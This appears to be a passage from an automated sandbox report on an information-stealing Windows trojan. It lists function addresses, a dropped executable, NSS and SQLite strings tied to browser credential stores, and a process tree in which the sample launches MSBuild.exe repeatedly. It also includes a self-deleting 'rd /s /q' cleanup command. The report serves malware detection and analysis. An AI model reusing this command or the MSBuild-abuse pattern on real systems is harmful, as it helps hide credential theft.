Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8C5190	4_2_6C8C5190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8E2990	4_2_6C8E2990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C88C9A0	4_2_6C88C9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8BD9B0	4_2_6C8BD9B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8AA940	4_2_6C8AA940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C89D960	4_2_6C89D960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8DB970	4_2_6C8DB970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8FB170	4_2_6C8FB170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8FBA90	4_2_6C8FBA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8822A0	4_2_6C8822A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8B4AA0	4_2_6C8B4AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C89CAB0	4_2_6C89CAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8F2AB0	4_2_6C8F2AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8C8AC0	4_2_6C8C8AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8A1AF0	4_2_6C8A1AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8CE2F0	4_2_6C8CE2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8C9A60	4_2_6C8C9A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C88F380	4_2_6C88F380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8F53C8	4_2_6C8F53C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8CD320	4_2_6C8CD320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C885340	4_2_6C885340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C89C370	4_2_6C89C370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C98ECD0	4_2_6C98ECD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C92ECC0	4_2_6C92ECC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6CA0AC30	4_2_6CA0AC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C9F6C00	4_2_6C9F6C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C93AC60	4_2_6C93AC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C9C6D90	4_2_6C9C6D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C934DB0	4_2_6C934DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6CABCDC0	4_2_6CABCDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6CAB8D20	4_2_6CAB8D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C9FED70	4_2_6C9FED70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6CA5AD50	4_2_6CA5AD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C9B6E90	4_2_6C9B6E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C93AEC0	4_2_6C93AEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C9D0EC0	4_2_6C9D0EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6CA10E20	4_2_6CA10E20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C9CEE70	4_2_6C9CEE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6CA78FB0	4_2_6CA78FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C93EFB0	4_2_6C93EFB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6CA0EFF0	4_2_6CA0EFF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C930FE0	4_2_6C930FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C936F10	4_2_6C936F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6CA70F20	4_2_6CA70F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C99EF40	4_2_6C99EF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C9F2F70	4_2_6C9F2F70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6CA368E0	4_2_6CA368E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C980820	4_2_6C980820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C9BA820	4_2_6C9BA820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6CA04840	4_2_6CA04840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C9F09B0	4_2_6C9F09B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C9C09A0	4_2_6C9C09A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C9EA9A0	4_2_6C9EA9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6CA4C9E0	4_2_6CA4C9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C9649F0	4_2_6C9649F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C986900	4_2_6C986900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C968960	4_2_6C968960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C9AEA80	4_2_6C9AEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C9DEA00	4_2_6C9DEA00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C9E8A30	4_2_6C9E8A30
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00AF20AD	13_2_00AF20AD
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B240E8	13_2_00B240E8
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B500E8	13_2_00B500E8
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B3A078	13_2_00B3A078
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B5C118	13_2_00B5C118
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B4E4B8	13_2_00B4E4B8
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B48468	13_2_00B48468
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B22558	13_2_00B22558
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B4E6F8	13_2_00B4E6F8
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B06625	13_2_00B06625
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B20648	13_2_00B20648
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B22AA8	13_2_00B22AA8
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B56B38	13_2_00B56B38
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B24DE8	13_2_00B24DE8
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B1EEF8	13_2_00B1EEF8
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B5B1B8	13_2_00B5B1B8
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B191CA	13_2_00B191CA
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B23148	13_2_00B23148
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B1F2A8	13_2_00B1F2A8
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B1D2E2	13_2_00B1D2E2
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B19265	13_2_00B19265
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B1925D	13_2_00B1925D
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B1D248	13_2_00B1D248
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B19392	13_2_00B19392
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B093D2	13_2_00B093D2
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B19461	13_2_00B19461
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B235D8	13_2_00B235D8
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B1B658	13_2_00B1B658
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B5FAB8	13_2_00B5FAB8
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B45A23	13_2_00B45A23
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B29A28	13_2_00B29A28
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B1FCA8	13_2_00B1FCA8
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B35CD6	13_2_00B35CD6
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00AF1E05	13_2_00AF1E05
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B5FF78	13_2_00B5FF78

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA

Found potential string decryption / allocating functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 004047E8 appears 38 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 6C8C94D0 appears 90 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 6C8BCBE8 appears 134 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 00410609 appears 71 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 004104E7 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 6CAB09D0 appears 99 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00617A20 appears 51 times
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: String function: 00AF7A20 appears 51 times
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: String function: 00B24BC8 appears 97 times
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: String function: 00B26AA8 appears 171 times

One or more processes crash

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 308

PE / OLE file has an invalid certificate

Source: file.exe

Static PE information: invalid certificate

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe	Static PE information: Section: .data ZLIB complexity 0.9919468068035944
Source: CBFCFBFBFB.exe.4.dr	Static PE information: Section: .data ZLIB complexity 0.9911440122377623
Source: a43486128347[1].exe.4.dr	Static PE information: Section: .data ZLIB complexity 0.9911440122377623

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@22/32@14/5

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 4_2_6C8E7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

4_2_6C8E7030

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 4_2_004114A5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

4_2_004114A5

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

4_2_00411807

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\76561199780418869[1].htm

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3636
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess900
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7004:120:WilError_03

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File created: C:\Users\user\AppData\Local\Temp\delays.tmp

Jump to behavior

Source: C:\ProgramData\CBFCFBFBFB.exe	Command line argument: MZx	13_2_00AF20AD
Source: C:\ProgramData\CBFCFBFBFB.exe	Command line argument: MZx	13_2_00AF20AD
Source: C:\ProgramData\CBFCFBFBFB.exe	Command line argument: MZx	13_2_00AF20AD

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2231687114.000000006CABF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.4.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2231687114.000000006CABF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.4.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2231687114.000000006CABF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.4.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2231687114.000000006CABF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.4.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: MSBuild.exe, MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2231687114.000000006CABF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.4.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2231687114.000000006CABF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.4.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: BGDGHJ.4.dr, GCFBAK.4.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 308
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\ProgramData\CBFCFBFBFB.exe "C:\ProgramData\CBFCFBFBFB.exe"
Source: C:\ProgramData\CBFCFBFBFB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\ProgramData\CBFCFBFBFB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\ProgramData\CBFCFBFBFB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\ProgramData\CBFCFBFBFB.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 900 -s 320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\JJDBAEHIJKJK" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\ProgramData\CBFCFBFBFB.exe "C:\ProgramData\CBFCFBFBFB.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\JJDBAEHIJKJK" & exit	Jump to behavior
Source: C:\ProgramData\CBFCFBFBFB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\ProgramData\CBFCFBFBFB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\ProgramData\CBFCFBFBFB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll	Jump to behavior
